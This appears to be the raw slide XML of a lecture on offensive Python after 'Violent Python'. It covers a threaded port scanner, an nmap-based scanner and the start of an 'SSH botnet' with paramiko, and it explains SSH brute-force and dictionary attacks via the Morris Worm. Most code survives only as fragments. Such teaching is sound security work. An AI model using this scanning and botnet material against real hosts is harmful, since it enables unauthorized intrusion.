          </a:p>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To implement threading in the scan, the iteration loop in the portScan() function is modified. The connScan function is called as a thread, with each thread created in the iteration appearing to execute at the same time. The line of code "t = Thread(target=connScan.args=(tgtHost, int(tgtPort)))" creates a new thread that runs connScan function with the arguments tgtHost and tgtPort, as integers. The line "t.start()" starts the thread. This way, each thread is scanning a different port simultaneously, rather than sequentially, which increases the speed of the scan</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;g1e9adf94182_12_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575036" y="2373015"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91071" y="7941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Integrating NMAP scan</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294950" y="2292925"/>
            <a:ext cx="11305200" cy="4284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nmap</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argparse</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nmap_scan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tgt_ports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nm_scan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nmap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PortScanner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tgt_port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tgt_ports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nm_scan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scan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state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nm_scan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'tcp'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tgt_port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'state'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tcp/</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tgt_port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state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fa8498ff28_0_15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91071" y="7941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Integrating NMAP scan</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;g1fa8498ff28_0_15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294950" y="2292925"/>
            <a:ext cx="11305200" cy="4284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__name__</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'__main__'</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argparse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ArgumentParser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usage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'nmap_scan.py TARGET_HOST -p TARGET_PORTS'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add_argument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type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metavar</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'TARGET_HOST'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help</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"specify target host's IP number"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add_argument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'-p'</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type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metavar</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'TARGET_PORTS'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help</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'specify target port[s] separated by comma '</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'(no spaces)'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parse_args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.ports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.p).</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="61AFEF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>split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nmap_scan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.host, </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.ports)</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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="7043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500"/>
              <a:t>BUILDING AN SSH BOTNET WITH PYTHON</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386701" y="2377375"/>
            <a:ext cx="11418600" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Now that we have constructed a port scanner to find targets, we can begin the task of exploiting the vulnerabilities of each service. The Morris Worm includes forcing common usernames and passwords against the remote shell (RSH) service as one of its three attack vectors. In 1988, RSH provided an excellent (although not very secure) method for a system administrator to remotely connect to a machine and manage it by performing a series of terminal com mands on the host. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The Secure Shell (SSH) protocol has since replaced RSH by combining RSH with a public-key cryptographic scheme in order to secure the traffic. However, this does very little to stop the same attack vector by forcing out common user names and passwords. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="20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1e9adf94182_17_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="7859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BUILDING AN SSH BOTNET WITH PYTHON</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;g1e9adf94182_17_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="2573793"/>
            <a:ext cx="11662163" cy="3948192"/>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Char char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes a technique used in the Morris Worm, a computer worm that was first discovered in 1988, for exploiting vulnerabilities in remote shell (RSH) service. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The Morris Worm used a technique of forcing common usernames and passwords against the RSH service as one of its three attack vectors. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>RSH was a service that provided an easy way for system administrators to remotely connect to a machine and manage it by performing terminal commands on the host. However, it was not very secure, and the Morris Worm was able to exploit this weakness.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Since the discovery of the Morris Worm, the Secure Shell (SSH) protocol has replaced RSH. SSH is more secure than RSH because it combines RSH with a public-key cryptographic scheme to encrypt the traffic. However, this does not necessarily stop the same attack vector of forcing common usernames and passwords, as SSH is still vulnerable to brute force attacks and dictionary attacks. The statement points out that SSH is more secure than RSH in terms of protecting the traffic but not in terms of protecting the authentication aspect.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Google Shape;366;g1e9adf94182_17_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650450" y="1995943"/>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f87e024115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500"/>
              <a:t>BUILDING AN SSH BOTNET WITH PYTHON</a:t>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;g1f87e024115_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11244000" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SSH Worms have proven to be very successful and common attack vectors Take a look at the intrusion detection system (IDS) log from [violent python] book  for a recent SSH attack lere, the attacker has attempted to connect to the machine using the accounts ucla, oxford, and matrix. These are interesting choices. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="228600" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Luckily for us, the IDS prevented further SSH login attempts from the attacking IP address after noticing its trend to forcibly produce the passwords</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1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e9adf94182_22_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140196" y="7859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BUILDING AN SSH BOTNET WITH PYTHON</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;g1e9adf94182_22_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482348" y="2817650"/>
            <a:ext cx="11389800" cy="35994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SzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes a type of attack known as an SSH worm, which is a type of malware that uses the Secure Shell (SSH) protocol to spread and infect other systems. SSH worms are a common type of attack and have been known to be very successful. The statement references an intrusion detection system (IDS) log which shows a recent SSH attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In this specific attack, the attacker attempted to connect to the machine using the accounts ucla, oxford, and matrix. These are interesting choices for account names as it could be either default account names for specific SSH servers or a dictionary-based attack. The IDS was able to detect the trend of the attacker attempting to guess the passwords and prevent further login attempts from the IP address, successfully stopping the attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;g1e9adf94182_22_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="848413" y="2239790"/>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e9adf94182_2_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="8350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latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>BUILDING A PORT SCANNER</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;g1e9adf94182_2_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="3208182"/>
            <a:ext cx="11472600" cy="4333261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The above passage is saying that before an attacker can launch a cyber attack, they must first gather information about the target system or network to identify vulnerabilities that can be exploited. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This initial information-gathering phase is called reconnaissance. The passage goes on to explain that Python, like most modern programming languages, provides access to the BSD socket interface. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This interface is a set of functions that allow developers to create, bind, listen, connect, or send traffic on TCP/IP sockets. In other words, it allows programmers to write applications that can perform network communications between different computer systems.</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;g1e9adf94182_2_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499621" y="2293540"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="810500"/>
            <a:ext cx="103104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BUILDING AN SSH BOTNET WITH PYTHON CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Trebuchet MS"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305075" y="2045750"/>
            <a:ext cx="11477400" cy="4720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paramiko</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class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Client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__init__</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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host</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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user</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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password</a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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session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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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connect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connect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5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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try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ssh_client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paramiko</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SSHClient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ssh_client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set_missing_host_key_policy</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paramiko</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AutoAddPolicy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ssh_client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connect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hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>self</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56B6C2"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E5C07B"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
